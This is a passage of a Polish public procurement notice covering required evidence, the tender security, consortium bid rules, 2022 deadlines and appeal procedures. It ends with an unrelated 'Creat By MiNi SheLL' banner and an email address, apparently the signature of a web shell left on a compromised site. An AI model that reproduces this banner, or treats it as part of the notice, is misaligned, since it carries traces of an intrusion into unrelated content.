zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>5.	Oceniając zdolność techniczną lub zawodową Wykonawcy, Zamawiający działając na podstawie art. 116 ust. 2 PZP w zw. z art. 266 PZP może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wstępnego potwierdzenia braku podstaw do wykluczenia z postępowania, o których mowa w pkt 5.1. oraz w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 6.1 SWZ. Wykonawca składa wraz z ofertą oświadczenia, o których mowa w art. 125 PZP, tj. wstępne oświadczenie o spełnianiu warunków udziału, sporządzone zgodnie ze wzorem stanowiącym załącznik nr 1 do SWZ oraz wstępne oświadczenie o braku podstaw do wykluczenia, sporządzone zgodne ze wzorem stanowiącym załącznik nr 2 do SWZ. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w zdaniu poprzednim, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu (zgodnie ze wzorem stanowiącym załącznik nr 2a do SWZ) oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby (zgodnie ze wzorem stanowiącym załącznik nr 1a do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 6.1. Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a)	wykazu usług, w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości brutto, przedmiotu (rodzaju wykonanych usług), dat wykonania (dat dziennych rozpoczęcia i zakończenia realizacji) i podmiotów, na rzecz których usługi zostały wykonane (wzór wykazu wykonanych usług stanowi załącznik nr 6 do SWZ),<br/>	3-letni okres należy liczyć wstecz od dnia, w którym upływa termin składania ofert<br/>	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonanych wspólnie z innymi wykonawcami, wykaz dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy. <br/><br/>b)	dowodów określających, czy wskazane przez Wykonawcę usługi na potwierdzenie spełnienia warunku udziału w postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane lub są wykonywane należycie.<br/><br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>	3-miesięczny okres należy liczyć wstecz od dnia, w którym upływa termin składania ofert<br/>c)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia (jeżeli jest wymagane) niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu osób stanowi załącznik nr 7 do SWZ),</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 7591.00 PLN <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum): <br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>2)	oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3)	oświadczenie, o którym mowa w art. 125 ust. 1 PZP składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Ww. oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia powinno zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4)	dokumenty, o których mowa w pkt 8.2. lit. a wykonawcy wspólnie ubiegający się o zamówienie składają wspólnie, natomiast dokumenty, o których mowa w pkt 8.2. lit. b i c składa ten z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, który wykazuje spełnienie warunku udziału w postępowaniu, do którego wykazania służy dany dokument; <br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Zamawiający zaleca złożyć to oświadczenie na formularzu stanowiącym załącznik nr 4 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności w niej wymienionych z uwzględnieniem podanych we wzorze umowy warunków ich wprowadzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniPortal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-29 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCE WYKONAWCY W TOKU POSTĘPOWANIA O ZMÓWIENIE PUBLICZNE.<br/><br/>1. Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów PZP, przysługują środki ochrony prawnej określone w dziale IX PZP tj. odwołanie i skarga do sądu. Postępowanie odwoławcze uregulowane zostało w przepisach art. 506-578 PZP, a postępowanie skargowe w przepisach art. 579-590 PZP.<br/>2.	Odwołanie przysługuje na:<br/>1)	niezgodną z przepisami PZP czynność Zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, w tym na projektowane postanowienie umowy;<br/>2)	zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której Zamawiający był obowiązany na podstawie PZP;<br/>3)	zaniechanie przeprowadzenia postępowania o udzielenie zamówienia, mimo że Zamawiający był do tego obowiązany.<br/>3. Odwołanie wnosi się do Prezesa Izby. Odwołujący przekazuje zamawiającemu odwołanie wniesione w formie elektronicznej albo postaci elektronicznej albo kopię tego odwołania, jeżeli zostało ono wniesione w formie pisemnej, przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu. Domniemywa się, że zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu do jego wniesienia, jeżeli przekazanie odpowiednio odwołania albo jego kopii nastąpiło przed upływem terminu do jego wniesienia przy użyciu środków komunikacji elektronicznej.<br/>4.	Odwołanie wnosi się w terminie: (a) 5 dni od dnia przekazania informacji o czynności Zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana przy użyciu środków komunikacji elektronicznej, (b) 10 dni od dnia przekazania informacji o czynności Zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana w sposób inny niż określony w lit. (a).<br/>5.	Odwołanie wobec treści ogłoszenia wszczynającego postępowanie o udzielenie zamówienia lub wobec treści dokumentów zamówienia wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub zamieszczenia dokumentów zamówienia na stronie internetowej.<br/>6.	Odwołanie w przypadkach innych niż określone w pkt 18.4. i 18.5 SWZ wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia. <br/>7.	Na orzeczenie Krajowej Izby Odwoławczej oraz postanowienie Prezesa Krajowej Izby Odwoławczej, o którym mowa w art. 519 ust. 1 PZP, stronom oraz uczestnikom postępowania przysługuje skarga do sądu. Skargę wnosi się do Sądu Okręgowego w Warszawie - sądu zamówień publicznych. Skargę wnosi się za pośrednictwem Prezesa Krajowej Izby Odwoławczej, w terminie 14 dni od dnia doręczenia orzeczenia Krajowej Izby Odwoławczej lub postanowienia Prezesa Krajowej Izby Odwoławczej, o którym mowa w art. 519 ust. 1 PZP, przesyłając jednocześnie jej odpis przeciwnikowi skargi. Złożenie skargi w placówce pocztowej operatora wyznaczonego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (tekst jedn. Dz. U. z 2020 r. poz. 1041 z późn. zm.) jest równoznaczne z jej wniesieniem.<br/><br/>Wartość podana w 4.1.5 jest wartością netto.<br/><br/>Szczegółowe informacje dot. postępowania znajdują się w dokumentach zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com